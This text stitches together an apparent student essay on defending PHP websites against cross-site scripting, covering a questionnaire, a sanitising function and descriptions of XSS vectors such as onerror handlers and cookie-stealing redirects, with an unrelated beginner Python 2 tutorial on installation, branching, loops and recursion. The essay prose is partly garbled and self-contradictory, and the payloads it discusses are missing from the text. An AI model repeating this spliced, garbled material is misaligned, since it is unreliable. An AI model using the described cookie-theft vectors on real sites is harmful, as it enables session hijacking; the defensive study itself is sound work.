# The comments below have been numbered as steps, to make explanation # of the code easier. Please read according to those steps. # (step number 1, for example, is at the bottom) def mult(a, b): # (2.) This function will keep repeating itself, because.... if b == 0: return 0 rest = mult(a, b - 1) # (3.) ....Once it reaches THIS, the sequence starts over again and goes back to the top! value = a + rest return value # (4.) therefore, "return value" will not happen until the program gets past step 3 above print "3 * 2 = ", mult(3, 2) # (1.) The "mult" function will first initiate here # The "return value" event at the end can therefore only happen # once b equals zero (b decreases by 1 everytime step 3 happens). # And only then can the print command at the bottom be displayed. # See it as kind of a "jump-around" effect. Basically, all you # should really understand is that the function is reinitiated # WITHIN ITSELF at step 3. Therefore, the sequence "jumps" back # to the top.
Commented_factorial.py
# Another "jump-around" function example: def factorial(n): # (2.) So once again, this function will REPEAT itself.... if n <= 1: return 1 return n * factorial(n - 1) # (3.) Because it RE-initiates HERE, and goes back to the top. print "2! =", factorial(2) # (1.) The "factorial" function is initiated with this line print "3! =", factorial(3) print "4! =", factorial(4) print "5! =", factorial(5)
Commented_countdown.py
# Another "jump-around", nice and easy: def count_down(n): # (2.) Once again, this sequence will repeat itself.... print n if n > 0: return count_down(n-1) # (3.) Because it restarts here, and goes back to the top count_down(5) # (1.) The "count_down" function initiates here # First get the test questions # Later this will be modified to use file io. def get_questions(): # notice how the data is stored as a list of lists return [["What color is the daytime sky on a clear day? ", "blue"], ["What is"]] # # go to the next question index = index + 1 # notice the order of the computation, first multiply, then divide print ("You got", right * 100 / len(questions), "% right out of", len
for good for? The first use is to go through all the elements of a list and do something with each of them. Here's a quick way to add up all the elements:
list = [2, 4, 6, 8] sum = 0 for num in list: sum = sum + num print "The sum\tl:", l l.sort() print "l.sort()", "\t\tl:", l prev = l[0] print "prev = l[0]", "\t\tprev:", prev del l[0] print "del l[0]", "\t\tl:", l for item in l: if prev == item: print "Duplicate of", prev, "found" print "if prev == item:", "\t.
Using Modules
Here's this chapter's typing exercise (name it cal.py).
import actually looks for a file named calendar.py and reads it in. If the file is named calendar.py and it sees an "import calendar" it tries to read in itself which works poorly at best.)): Decisions to use = input ("Guess a number: ") if guess > number: print "Too high" elif guess < number: print "Too low" print "Just right"
More on Lists a integer. There is also a similar function called
float() that will convert
# IO
Now modify the grades program from section Dictionaries so that it uses file IO to keep a record of the students.
Now modify the grades program from section Dictionaries so that it uses file IO()..
- Question:.
License
The Non-Programmer's Tutorial for Python is licensed under the GNU Free Documentation License. All programming examples in the text are granted to the public domain.. | http://en.wikibooks.org/wiki/Non-Programmer's_Tutorial_for_Python_2.6/Print_version | CC-MAIN-2015-11 | refinedweb | 4,022 | 73.17 |
Bummer! This is just a preview. You need to be signed in with a Basic account to view the entire video. last video, we used a design pattern to build a service registry and
- 0:05
I mentioned that we'd circle back to it.
- 0:06
Well, here we are.
- 0:08
This pattern, called the Builder Pattern, is used to address a few common pit falls.
- 0:14
Mainly, the one of classes that have many fields.
- 0:17
Creating an object is accomplished by calling the classes constructor.
- 0:21
But, if the class has five instance feilds, like ours does.
- 0:25
We might end up with a constructor that has five perameters.
- 0:29
But the code that we type to instantiate an object with
- 0:31
five perimeters isn't that readable.
- 0:34
And what if we want to be able to create an object,
- 0:36
while specifying only a couple field values?
- 0:39
Well, I guess we need a constructor, but
- 0:42
the order of that parameter list may not be so obvious either.
- 0:46
So, we arrive at the builder pattern.
- 0:48
Using this pattern,
- 0:49
we're able to create readable code that's intuitive and easy to use.
- 0:53
To see how this is done, let's do this for our contact class now.
- 0:58
To demonstrate what we'd like to avoid, I'll use similar code here.
- 1:01
It's what we used earlier in the course to construct a sample contact object.
- 1:06
So, I'll create a contact, I'll name it contact.
- 1:09
And I will call a constructor that doesn't really exist but
- 1:12
let's pretend that it does.
- 1:13
I'll pass my first name, last name, email address.
- 1:21
And a phone number 773-555-6666.
- 1:22
Now if we had coded this
- 1:28
constructor in a contact class, as we did in workspaces earlier in the course.
- 1:32
We might remember the order of our four parameters or
- 1:35
we could pop open the source code to see.
- 1:37
Still, this would require an extra step that draws attention to the fact that our
- 1:41
code isn't as readable as it should be.
- 1:43
Even more, what if the contact class came from a jar file we've included in our
- 1:47
project and we don't have access to the source code?
- 1:50
For those reasons and
- 1:51
others, many developers choose the builder pattern to address concerns.
- 1:55
Wouldn't it be much more intuitive and
- 1:57
readable if our code coud look like this instead?
- 2:01
So, I'll create a contact and
- 2:03
builder object to specify something that we feel our users would know.
- 2:08
The first name and the last name and then, I'll put this on a separate line for
- 2:12
readability.
- 2:13
On that object, I could call a withEmail method and specify my email address.
- 2:22
And with that return value, I could call a withPhone method and
- 2:26
specify the phone number.
- 2:31
And that should be a long, not a string.
- 2:34
And finally, I'd call a build method to build my final contact object.
- 2:40
And actually, without too much effort, our code could look like this.
- 2:45
So, let's head over to contact.java to see how we can accomplish this.
- 2:51
The first thing we'll need to do is, add a contact builder class.
- 2:54
And though we could create this in a separate file,
- 2:56
we can also embed a static class in the contact class.
- 2:59
So for simplicity here in this course, that's what we'll do and
- 3:03
I will do this at the bottom.
- 3:05
Public, static, class, contact, builder.
- 3:12
We'll need a field in this class for
- 3:14
each of the contact fields we want our builder to configure.
- 3:17
So let's add those now.
- 3:18
I'll scroll up, and copy and paste the four that I'm interested in.
- 3:22
From above, so I'm interested in these four, right here.
- 3:27
So, I'll paste those right here and I'll remove my JPA annotations.
- 3:39
Great, now the contact builder constructor will contain
- 3:42
the two fields that are required.
- 3:44
And then, we might assume everyone will get right away, the first name and
- 3:48
the last name.
- 3:49
Of course, this assumption could certainly be up for debate.
- 3:52
Let's create that constructor now, public contactBuilder.
- 3:59
And in there, I'll specify the first name and the last name.
- 4:05
And this like any other constructor, will initialize its fields.
- 4:15
And now, we get to add those handy readable methods that we so desired.
- 4:19
Here is the withEmail method.
- 4:22
I going to declare it as a public ContactBuilder method withEmail and
- 4:27
as a parameter, we specify the email address.
- 4:32
Now this method is sort of like a setter, in that,
- 4:35
we set a field using a given parameter value.
- 4:38
But, there's one glaring difference, which makes this builder pattern so
- 4:43
attractive and that is the return value.
- 4:46
Notice that we're returning a contact builder object here and
- 4:50
the return value is this.
- 4:53
The object on which the method was called, a contact builder object.
- 4:57
This is the part that allows us to chain method calls.
- 5:00
If I pop back over to application.java, I see these chain method calls.
- 5:05
I create a contact builder and on that builder, I create with email and
- 5:09
I chain that to a withPhone call and finally a buildCall.
- 5:17
So in a similar fashion, let's now code the withPhone method.
- 5:22
So below the withEmail, I'll create a public ContactBuilder method.
- 5:27
Call it withPhone, and as a parameter, I'll include a long
- 5:33
and again, like a setter, we will set the field using the parameter value.
- 5:39
Except that we, as opposed to a setter,
- 5:42
will return a contact builder object, this.
- 5:46
Now the final method we need to create in this class, is the build method.
- 5:50
So to do that,
- 5:51
this one will create the contact object that we are after in the end.
- 5:56
I'll call this build and we'll return a new contact object and
- 6:02
give the contact constructor a reference to this object.
- 6:07
And I can't forget to create the object by using the new keyword.
- 6:12
Now, since we don't have a constructor that accepts a contact builder
- 6:15
object as a parameter, we need to create that as well.
- 6:18
So, we'll scroll up here and create that.
- 6:21
I'll do that after my default constructor that I listed here.
- 6:24
Public contact and this will accept a contact builder object here.
- 6:29
I'll just name it builder as the parameter name.
- 6:32
And in this constructor,
- 6:33
we'll initialize all the contact fields with the builder field values.
- 6:38
So to do that, I'll start with this.firstName pools builder.firstName,
- 6:46
this.lastName Equals builder.lastname.
- 6:51
This.email equals builder.email, and
- 6:56
this.phone equals builder.phone and there you have it.
- 7:03
If you want to prove this works in application.java,
- 7:06
you can print the contact object to standard out and run the application.
- 7:10
Now, I see that I'm missing an import statement here, so I'll go ahead and
- 7:14
import that.
- 7:15
If you get this prefix of Contact.ContactBuilder,
- 7:19
that is because ContactBuilder is a static class in the contact class.
- 7:25
If you don't want your code to look like this,
- 7:28
you can simply alter the import statement above.
- 7:31
You can, in addition to importing this class,
- 7:35
you can import ContactBuilder explicitly.
- 7:40
So below this initialization of the contact object,
- 7:44
I can simply display the contact object.
- 7:47
Which willll call that objects to string method, which we included in our class.
- 7:53
Before I run this, I'm going to comment out the session factor.
- 7:56
Since we don't want to initialize all that hibernating functionality quite yet.
- 8:02
So with that commented out, I'm going to right click application and
- 8:06
choose run and let's see what our output contains.
- 8:11
There are the results of the Contact's two string method, I see I got an ID of zero.
- 8:16
That will be the default value of that long field.
- 8:20
As well as a first name, last name, email address and phone number that I specified.
- 8:25
It looks like our builder pattern worked.
- 8:30
Now you've seen the builder pattern.
- 8:32
Which is often used for objects that involve complex and
- 8:35
otherwise, unintuitive configuration.
- 8:38
For more on Java design patterns, check the teacher's notes.
- 8:42
But now back to our regularly scheduled hibernate program. | https://teamtreehouse.com/library/hibernate-basics/getting-started-with-hibernate/the-builder-design-pattern | CC-MAIN-2019-43 | refinedweb | 1,646 | 82.75 |
I use ST for R development. A popular package called roxygen (roxygen.org/) provides a way to document functions inline so it makes it super easy to generate final documentation when packaging a set of functions. I was wondering if someone could give me advice on how I would write a ST plugin to generate documentation templates. Here is an example:
Let's say I have a simple function like so:
test_function <- function(a,b)
{
a+b
}
then, the (basic) roxygen markup for this functions would look like so:
#'
#' <description>
#' @param a <description>
#' @param b <description>
test_function <- function(a,b)
{
a+b
}
I would like to write a plugin (or macro if that's what it would be called in this context) to automatically generate the template. I select the function and it could automatically generate the above based on what's in the function(....)
Note that the is just (my) place holder to indicate that one could (but does not have to) describe what that parameter (or function in the case of the top most line) does.
Ideas or suggestions?
thanks.
Sublime Text 2 uses python for its plugins. If you don't know python, it's very easy to learn. Here's st2's api for some help:
What you're asking for is very simple. I'll make it for you if you'd like. Just give me a couple minutes.
Here it is. Just click Tools > New Plugin. Replace the template with this:
import sublime, sublime_plugin
class RDocsCommand(sublime_plugin.TextCommand):
def run(self, edit):
sel = self.view.sel()[0]
params_reg = self.view.find('(?<=\().*(?=\))', sel.begin())
params_txt = self.view.substr(params_reg)
params = params_txt.split(',')
snippet = "#'\n#' <description>\n"
for p in params:
snippet += "#' @param %s <description>\n" % p
self.view.insert(edit, sel.begin(), snippet)[/code]
Then you have to add the keybinding to activate it. Open the command palette and type: "User Keybindings." Add the following to your keybindings: [code] { "keys": "super+shift+alt+r"], "command": "r_docs", "context":
{ "key": "selection_empty", "operator": "equal", "operand": false, "match_all": true },
{
"operand": "source.r",
"operator": "equal",
"match_all": true,
"key": "selector"
}
]
}
Note: you can change the "keys" value to whatever you want.
Usage: your function must be selected (actually only the first line needs to be selected) for this to work. Just press your keybinding to activate.
Perfect, thanks. I just started learning python on Monday so I am looking forward to contributing my own shortly. There is a syntax error with your keybinding code snippet that I can't get ST to accept. I'll play around to figure that out.
You most likely need to add a comma to any keybinding before or add a comma if there is a binding after since I just copied and pasted it from my keybindings (where it worked).
Commas kill...
Fixed and works beautifully. Thanks so much! | https://forum.sublimetext.com/t/plugin-for-generating-documentation-template-for-r/4081 | CC-MAIN-2017-39 | refinedweb | 474 | 66.64 |
XSS Prevention Cheatsheet
How to prevent XSS in Java, Python, Node.js, C#, Go, and Scala
Join the DZone community and get the full member experience.Join For Free
XSS, or Cross-Site Scripting, is one of the most common vulnerabilities found in applications. In bug bounty programs of different organizations, XSS consistently ranks as the most common vulnerability found. Today, let’s learn how these attacks work, how they manifest in code, and how to prevent them in your programming language. Let’s dive right in!
Anatomy of an XSS attack
XSS happens whenever an attacker can execute malicious scripts on a victim’s browser.
Applications often use user input to construct web pages. For example, a site might have a search functionality where the user can input a search term, and the search results page will include the term at the top of the results page. If a user searches “abc”, the source code for that page might look like this:
<h2>You searched for abc; here are the results!</h2>
But what if that application cannot tell the difference between user input and the legitimate code that makes up the original web page?
Attackers might be able to submit executable scripts and get that script embedded on a victim’s webpage. These malicious scripts can be used to steal cookies, leak personal information, change site contents, or redirect the user to a malicious site. There are three main types of XSS attacks: reflected XSS, stored XSS, and DOM XSS.
Reflected XSS
For example, if the application also allows users to search via URLs:
If an attacker can trick victims into visiting this URL:
some malicious script</script>
The script in the URL will become embedded in the page the victim is visiting, making the victim’s browser run the JS code contained within the
<script> tags. This is called a “reflected XSS” attack.
<h2>You searched for <script> some malicious script</script>; here are the results!</h2>
Stored XSS
During a stored XSS attack, the attacker places the malicious script into a database before it gets returned to the victim. Let’s say that example.com also allows users to post status updates for others to see. An attacker can post this status update:
POST /status/updatestatus=<script> some malicious script </script>
This malicious script will become embedded on the attacker’s profile page, attacking anyone who visits the attacker’s profile page.
DOM XSS
Finally, DOM-based XSS is similar to reflected XSS, except that in DOM-based XSS, the user input never leaves the user’s browser. Since the malicious input is never sent to the server, this type of XSS is harder to detect and prevent.
As in reflected XSS, attackers submit DOM-based XSS payloads via the victim’s user input. Unlike reflected XSS, a DOM-based XSS script doesn’t require server involvement, because it executes when user input modifies the source code of the page in the browser directly. Say a website allows the user to change their locale by submitting it via a URL parameter:
The URL parameter isn’t submitted to the server. Instead, it’s used to change the language of the webpage by a client-side script of the application. But if the website doesn’t validate the user-submitted parameter, an attacker can trick victims into visiting a URL like this one:
some malicious script </script>
The site will embed the payload on the user’s web page, and the victim’s browser will execute the malicious script.
Defeating XSS
The key to preventing XSS is output encoding. You should never insert user-submitted data directly into an HTML document. Instead, you should encode any untrusted input that ends up on an HTML page so that browsers know the input should be treated as content and not raw HTML. This will make sure that attackers cannot influence the way browsers interpret the information on the page by submitting dangerous characters or character sequences. For example, if someone submits
<script>alert(1)</script>, browsers should treat
<script> and
</script> as user content, not HTML script tags.
To prevent XSS, you should encode characters that have special meaning in HTML, such as the
&character, angle brackets, single and double quotes, and the forward-slash character. In our example, you can encode the left and right angle brackets can be encoded into HTML characters < and > to prevent browsers from treating the content as script tags.
However, there are many ways attackers can use to smuggle executable Javascript code into a victim's browser. And a blocklist-based encoding scheme like this one might miss a few characters that will allow attackers to achieve XSS. So, it might be worth it to consider stricter approaches to input validation. For example, you can validate user input against a list of allowed values, or only allow a limited set of characters (such as only alphanumeric characters in usernames) in user input.
The prevention of DOM-based XSS requires a different approach. Since the malicious user input won’t pass through the server, sanitizing the data that enters and departs from the server won’t work. Instead, you should avoid rewriting the HTML document based on user input, and implement client-side input validation before user input is inserted into the DOM.
Defense in Depth
You can also take measures to mitigate the impact of XSS flaws if they do happen. First, set the
HttpOnly flag on sensitive cookies that your site uses. This prevents attackers from stealing cookies via XSS. You should also implement the
Content-Security-Policy HTTP response header. This header lets you restrict how resources such as JavaScript, CSS, or images load on your web pages. To prevent XSS, you can instruct the browser to execute only scripts from a list of sources.
Preventing XSS in your Programming Language
Now, let’s talk about how you can prevent XSS vulnerabilities in your programming language!
Java
If you are using Java Server Pages (JSP), you need to be aware that JSP templates do not escape dynamic content by default. Let’s say that you want to display a message this way:
<h1>${message}</h1>
You will need to use the
<c:out> tag or
fn:escapeXml() function to escape potentially dangerous content in untrusted input:
<h1><c:out</h1><h1>${fn:escapeXml(message)}</h1>
Python
Most Python template languages will take care of output encoding for you. For example, Jinja2 will automatically encode any input placed within curly braces. This should prevent XSS in most cases.
{{ user-input }}
Node.js
Most Javascript template languages escape dynamic content by default. For example, the Nunjucks template language will automatically escape anything between curly braces:
{{ "<script>alert(1)</script>" }}
This will output in HTML:
<script>alert(1)</script>
C#
The Razor template language that uses C# automatically escapes dynamic content automatically and protects against most potential XSS attacks:
string message = "<script>alert(1)</script>";
}<h1>@message</h1>
This code will render the HTML code:
<h1><script>alert(1)</script></h1>
Go
The Go package
html/template will automatically escape dynamic content, protecting you from most XSS:
import "html/template"t, err := template.New("foo").Parse(`{{define "T"}}{{.}}{{end}}`)err = t.ExecuteTemplate(out, "T", "<script>alert(1)</script>")
This code will write the escaped string <script>alert(1)</script> to the output variable
out.
On the other hand, the
"text/template" package does not offer this protection.
Scala
Most template languages in Scala will also encode dynamic content by default. For instance, in the Play framework, this user input will be displayed safely:
<p>
@(user-input)
</p>
Overriding Safe Defaults
For each template language that automatically encodes dynamic content, there are ways of overriding the safe default, which might render the application vulnerable. And if you are constructing HTML code manually from user input and not using templates to render dynamic content, then you’ll need to find a way to encode the user input before inserting it into HTML strings. See our vulnerability database (TODO: add vulnerability database link) for some example scenarios that might make an application vulnerable and for some tips for escaping content manually in different programming languages.
Opinions expressed by DZone contributors are their own. | https://dzone.com/articles/xss-prevention-cheatsheet | CC-MAIN-2022-21 | refinedweb | 1,376 | 50.57 |
Breaking QByteArray::toBase64() results into 64 character lines
- Phil Weinstein
It would be nice if QByteArray::toBase64() had an option to split the results into multiple fixed-length lines.
Currently its results are just in a single line (i.e. with no line breaks). (We actually have a requirement for this; my group's model serialization can't have arbitrarily long lines). The documentation states that this function conforms to RFC 2045 which seems to require lines of no more that 76 characters, but there may be a technical reason why this isn't always required. But still, it would be nice. (Apparently some other Base64 encodings require line lengths of 64 characters, so that's a good general length).
Could QByteArray::toBase64() be enhanced with an optional integer parameter of the maximum line length, with 0 as the default for the current single-line behavior?
Here is a function we are now using to do this line breaking:
@QByteArray UserImageData::wrapAt64Chars (const QByteArray& inArray)
{
// This function takes a QByteArray lacking line breaks and returns
// that QByteArray value with line breaks inserted after every
// 64 bytes. It is intended for use with Base64-encoded QByteArrays
// created with QByteArray::toBase64() which generates a Base64 string
// without line breaks [as of Qt 4.8.5].
//
// Note that the QByteArray::fromBase64() static method ignores all
// characters which are not part of the encoding, including CR and LF.
// This is a provision of the "RFC 2045" Base64 standard supported by
// these methods. RFC 2045 specficies a maximum line length of 76
// characters. See:
//
// The code below was adapted from this method in Qt 4.8:
// ByteArray QSslCertificatePrivate::QByteArray_from_X509();
const int inSize = inArray.size();
const int outEst = inSize + (inSize/32) + 4;
QByteArray outArray;
outArray.reserve (outEst);
const char* inPtr = inArray.data();
for (int inCrs = 0; inCrs <= inSize - 64; inCrs += 64)
{
outArray += QByteArray::fromRawData (inPtr + inCrs, 64);
outArray += "\n";
}
const int rem = inSize % 64;
if (rem > 0)
{
outArray += QByteArray::fromRawData (inPtr + inSize - rem, rem);
outArray += "\n";
}
return (outArray);
}@
- SGaist Lifetime Qt Champion
Hi,
For this kind of demand, you should create a new feature request "here": . Asking this on the forum will likely get lost in the long run because it's not closely followed by Qt's maintainers/developers, it's more user oriented.
Happy coding :) | https://forum.qt.io/topic/33596/breaking-qbytearray-tobase64-results-into-64-character-lines | CC-MAIN-2018-51 | refinedweb | 381 | 52.6 |
Location something wrong, or does this have something to do with the way IOS works?
btw, I'm doing it like this.
import location while True: location.start_updates() sleep(3) #Or some other number loc = location.get_location() location.stop_updates() print loc.get('timestamp')
Hello,
I am having the same problem, unable to update location within a loop. Did you figure out how to fix this?The following code shows the same location and time stamp for each iteration of the loop.
import location, time
def getLocation():
location.start_updates() time.sleep(5) # give GPS hardware 5 seconds to wake up currLoc = location.get_location() return currLoc
x=0
while x<10:
print(getLocation())
x=x+1
- lenoirmind
Hello both. I found the same issue as well.
Both in a Scene based script and a script in the interpreter, I can't get the location module to update within a loop.
I am not sure if this could be an iOS "feature" that limits Pythonista's continuous sensing possibilities in a way. Would be great through if it would be possible to sense the location within a loop.
Hello,
same here, please anybody, a solution would be highly appreciated, this is quite an annoying problem for me.
THank you so much,
Hubertus | https://forum.omz-software.com/topic/620/location-timestamp-always-the-same | CC-MAIN-2018-30 | refinedweb | 209 | 68.57 |
You are given two strings X and Y with lengths m and n. You need to find the length of the longest common substring.
Sample Input: X = “neardycoderisaprogrammingsite”, Y = “iamanerdycoder”
Expected Output: 10
Explanation: The longest common substring here is “nerdycoder” of length 10.
Algorithm:
- Let m and n be the length of the strings X and Y.
- This problem can be solved using dynamic programming since it has both optimal substructure and overlapping subproblem.
- We initialize a max_ variable which will store the length of the longest common substring.
- Create a 2D array DP of size (m+1, n+1) and initialize it with 0.
- DP [i][j] will store the length of longest common substring for strings X[1…i] and Y[1…j].
- For every value of i and j, we do the following.
If X[i] == Y[j], then dp[i][j] = dp[i-1][j-1] + 1. This is because, if the current characters of both the strings are same, then we increase the length of the longest common substring upto those particular characters by 1. We then update the max_ variable accordingly.
Else, we set dp[i][j] = 0.
- The final answer is stored in dp[m][n].
/* Author => Raunak Jain */ #include <bits/stdc++.h> using namespace std; int helper(string X, string Y, int m, int n){ if(m==0 || n==0){ return 0; } int max_ = INT_MIN; vector<vector<int>> dp(m+1, vector<int>(n+1, 0)); for(int i=1; i<=m; i++){ for(int j=1; j<=n; j++){ if(X[i-1]==Y[j-1]){ dp[i][j] = dp[i-1][j-1]+1; max_ = max(max_, dp[i][j]); }else{ dp[i][j]=0; } } } return max_; } int main(){ string X = "nerdycoderisaprogrammingsite"; string Y = "Iamanerdycoder"; int m = X.size(); int n = Y.size(); cout<<helper(X, Y, m, n); return 0; }
Also take a look at another popular interview question Rod Cutting Problem. | https://nerdycoder.in/2020/08/06/longest-common-substring-dp-03/ | CC-MAIN-2021-04 | refinedweb | 324 | 73.58 |
The.
I'm sorry but I don't understand what you mean by sample file. Do you just want a file full of code that next/previous isn't working in? Here's a simple Python file next/previous stopped working in. The Python Linter is the only one I really use but I can try the others if you would like.
# alternate implementation with lengths
def myzip(*seqs):
minlen = min(len(s) for s in seqs)
return [tuple(s[i] for s in seqs) for i in range(minlen)]
def mymapPad(*seqs, **pad):
maxlen = max(len(s) for s in seqs)
index = range(maxlen)
return [tuple((s[i] if len(s) > i else pad) for s in seqs) for i in index]
s1, s2 = 'abc', 'xyz123'
print myzip(s1, s2)
print mymapPad(s1, s2)
print mymapPad(s1, s2, pad=99)
I get errors on lines 3-5 and 7-10, and next/previous error is working perfectly for me. Please remove all plugins but SublimeLinter from the Packages directory, restart ST2 and see if it works. If it does, some other plugin must be eating those key combinations.
If! | https://forum.sublimetext.com/t/sublimelinter/2353/30 | CC-MAIN-2017-09 | refinedweb | 190 | 64.64 |
Tic Tac Toe might be a futile children’s game but it can also teach us about artificial intelligence. Tic Tac Toe, or Naughts and Crosses, is a zero-sum game with perfect information. Both players know exactly what the other did and when nobody makes a mistake, the game will always end in a draw.
Tic Tac Toe is a simple game but also the much more complex game of chess is a zero-sum game with perfect information.
In this two-part post, I will build an unbeatable Tic Tac Toe Simulation. This first part deals with the mechanics of the game. The second post will present an algorithm for a perfect game.
Drawing the Board
This first code snippet draws the Tic Tac Toe simulation board. The variable xo holds the identity of the pieces and the vector board holds the current game. Player X is denoted with -1 and player O with +1. The first part of the function draws the board and the naughts and crosses. The second part of the code check for three in a row and draws the corresponding line.
draw.board <- function(board) { # Draw the board xo <- c("X", " ", "O") # Symbols par(mar = rep(0,4)) plot.new() plot.window(xlim = c(0,30), ylim = c(0,30)) abline(h = c(10, 20), col="darkgrey", lwd = 4) abline(v = c(10, 20), col="darkgrey", lwd = 4) pieces <- xo[board + 2] text(rep(c(5, 15, 25), 3), c(rep(25, 3), rep(15,3), rep(5, 3)), pieces, cex = 6) # Identify location of any three in a row square <- t(matrix(board, nrow = 3)) hor <- abs(rowSums(square)) if (any(hor == 3)) hor <- (4 - which(hor == 3)) * 10 - 5 else hor <- 0 ver <- abs(colSums(square)) if (any(ver == 3)) ver <- which(ver == 3) * 10 - 5 else ver <- 0 diag1 <- sum(diag(square)) diag2 <- sum(diag(t(apply(square, 2, rev)))) # Draw winning lines if (hor > 0) lines(c(0, 30), rep(hor, 2), lwd=10, col="red") if (ver > 0) lines(rep(ver, 2), c(0, 30), lwd=10, col="red") if (abs(diag1) == 3) lines(c(2, 28), c(28, 2), lwd=10, col="red") if (abs(diag2) == 3) lines(c(2, 28), c(2, 28), lwd=10, col="red") }
Random Tic Tac Toe
The second part of the code generates ten random games and creates and animated GIF-file. The code adds random moves until one of the players wins (winner <> 0) or the board is full (no zeroes in the game vector). The eval.winner function checks for three in a row and declares a winner when found.
There are 255,168 possible legal games in Tic Tac Toe, 46,080 of which end in a draw. This implies that these randomised games result in a draw 18% of the time.
eval.winner <- function(board) { # Identify winner square <- t(matrix(board, nrow = 3)) hor <- rowSums(square) ver <- colSums(square) diag1 <- sum(diag(square)) diag2 <- sum(diag(t(apply(square, 2, rev)))) if (3 %in% c(hor, ver, diag1, diag2)) return (1) else if (-3 %in% c(hor, ver, diag1, diag2)) return (2) else return(0) } # Random game library(animation) saveGIF ({ for (i in 1:10) { game <- rep(0, 9) # Empty board winner <- 0 # Define winner player <- -1 # First player draw.board(game) while (0 %in% game & winner == 0) { # Keep playing until win or full board empty <- which(game == 0) # Define empty squares move <- empty[sample(length(empty), 1)] # Random move game[move] <- player # Change board draw.board(game) winner <- eval.winner(game) # Evaulate game player <- player * -1 # Change player } draw.board(game) } }, interval = 0.25, movie.name = "ttt.gif", ani.width = 600, ani.height = 600)
Tic Tac Toe Simulation
In a future post, I will outline how to program the computer to play against itself, just like in the 1983 movie War Games.
The post Tic Tac Toe Simulation — Random Moves... | https://www.r-bloggers.com/tic-tac-toe-simulation-random-moves/ | CC-MAIN-2018-39 | refinedweb | 654 | 67.18 |
Am Sonntag, 4. September 2011, 13:10:56 schrieb Jordi Negrevernis i Font: > En/na Matthias Pfafferodt ha escrit: > > The check is implemented like this since 2004 ...Considering patch #2943 > > (), the index values should be compared: > > > > bool same_pos(const struct tile *tile1, const struct tile *tile2) > > { > > > > fc_assert_ret_val(tile1 != NULL&& tile2 != NULL, FALSE); > > return (tile1->index == tile2->index); > > > > }
Advertising
This code would be a patch - it changes the comparison of pointers to a comparison of the index value. > > But this is not the code on S2_3 and trunk!! It's that: > > bool same_pos(const struct tile *tile1, const struct tile *tile2) > { > fc_assert_ret_val(tile1 != NULL && tile2 != NULL, FALSE); > return (tile1 == tile2); > } > > This is comparing only the pointers!!! Is this correct? It is correct as long as no virtual tile is used. In this case there is only _one_ map with pointers to each tile. So to check if two positions (tiles) are identical, the pointers must be compared. With virtual tiles, one of the tiles could be such a special tile and the check would fail if if it is the same position. Thus, something else, like the index, is needed. The code above should be applied on top of the patch mentioned in my first mail. Else, the index value for the virtual tile is not set. > > > Am Sonntag, 4. September 2011, 02:48:24 schrieb Jordi Negrevernis i Font: > >> I was trying to debug some issues with the AI, and i realized that > >> > >> some checks I put in the code didn't succeed because the 'same_pos' > >> function does not check the value of x and y in the structure, instead > >> it just compares the points!!!????!!! > >> > >> How is that supposed to work??!! Which is the way to check two > >> > >> locations? > >> > >> Thanks > >> > >> _______________________________________________ > >> Freeciv-dev mailing list > >> Freeciv-dev@gna.org > >> > > > > _______________________________________________ > > Freeciv-dev mailing list > > Freeciv-dev@gna.org > > > > _______________________________________________ > Freeciv-dev mailing list > Freeciv-dev@gna.org > _______________________________________________ Freeciv-dev mailing list Freeciv-dev@gna.org | https://www.mail-archive.com/freeciv-dev@gna.org/msg23973.html | CC-MAIN-2018-22 | refinedweb | 326 | 75.3 |
On Tue, 11 Jan 2000, David Grothe wrote:> Alexander Viro wrote:> > > _All_ ->u is off-limits for any device code. It> > belongs to hosting filesystem and to nobody else.> > If a driver needs to have a private structure that associates with each "real"> file (inode instance) then what is the recommended technique? Private hash> table on major/minor? What is the officially recommended technique here.> > I obviously misunderstood that the generic_ip was like a private structure> pointer in a number of other kernel control structures, such as net_device.Hold on. Inode is not a good thing here - if (_big_ if) you need per-filedata - refer to it from struct file (that is, if you really need it onper-opener basis; _very_ rare situation). If you need it on per-device -keep it in the driver. Inode gives either too coarse or too finegranularity here - there may be a lot of independent openers of inode andthere may be many inodes pointing to your device. In effect, device inodeacts as a sort of symlink - just that it points into other namespace.-To unsubscribe from this list: send the line "unsubscribe linux-kernel" inthe body of a message to majordomo@vger.rutgers.eduPlease read the FAQ at | https://lkml.org/lkml/2000/1/12/5 | CC-MAIN-2014-15 | refinedweb | 204 | 63.59 |
On 12/3/06, Graham Percival <address@hidden> wrote:
Han-Wen Nienhuys wrote: > Graham Percival escreveu: >> Han-Wen Nienhuys wrote: >>> As I've said before: it's almost trivially easy to make the frontend >>> x86 too, but someone needs to run py2app on an intel box, and >>> send me the results. >> I installed fink's py2app-py24 but that gave my a "py2applet" file. When >> I run that, I get usage info. What should I do? (I'm not familiar with >> python) > > something like > > python setup.py py2app Err... like this? w163-mac:~/tmp gperciva$ py2applet --make-setup Wrote setup.py w163-mac:~/tmp gperciva$ python setup.py Traceback (most recent call last): File "setup.py", line 8, in ? from setuptools import setup ImportError: No module named setuptools
Unfortunately you're not. Python's complaining that the setuptools module isn't available and so the import fails. You can try using find (matching on the name setuptools) to see if you have the module on your system at all. If you do have setuptools on your filesystem, change the value of PYTHONPATH (which you can, of course, echo on the commandline to inspect) to include whatever directory setuptools lives in. If you don't have setuptools on your system then you'll have to go fetch it from somewhere. You can also type prompt> python
import setuptools
to test python and see if it can find the setuptools module once you've done the installation. -- Trevor Bača address@hidden | http://lists.gnu.org/archive/html/lilypond-devel/2006-12/msg00052.html | CC-MAIN-2013-48 | refinedweb | 249 | 66.64 |
Setup
Install scala 2.11 and sbt:
$ brew install scala sbt
Incidentally, I have been using emr-5.0.0. The Hadoop and Spark versions are 2.7 and 2.0. If you intend to run on EMR, it is important that your jar should be compiled with the same version of Scala used to compile Spark, and this includes both the local Spark library and the Spark installed on the EMR cluster.
Download Spark 2.0. If a uncompiled version was downloaded, compile it with:
$ ./build/mvn -DskipTests clean package
The bin directory contains two useful scripts: bin/spark-shell and bin/spark-submit. You might want to put these in your search path. Symlinks aren't good enough. Here are the two scripts that I put in my search path:
#!/bin/bash cd /Users/clark/Local/src/spark-2.0.0 exec ./bin/spark-shell "$@"
and
#!/bin/bash cd /Users/clark/Local/src/spark-2.0.0 exec ./bin/spark-submit "$@"
Resilient Distributed Datasets (RDDs)
Read a file on the local file system into an RDD:
import org.apache.spark.SparkContext val sc = new SparkContext() val lines = sc.textFile("/PATH/TO/file.txt")
lines is of type org.apache.spark.rdd.RDD[String]. Each line in the source file becomes a String in the RDD.
An RDD provides first and take methods for getting the first and the first N records.
Here is an example of using Spark to process and /etc/passwd file:
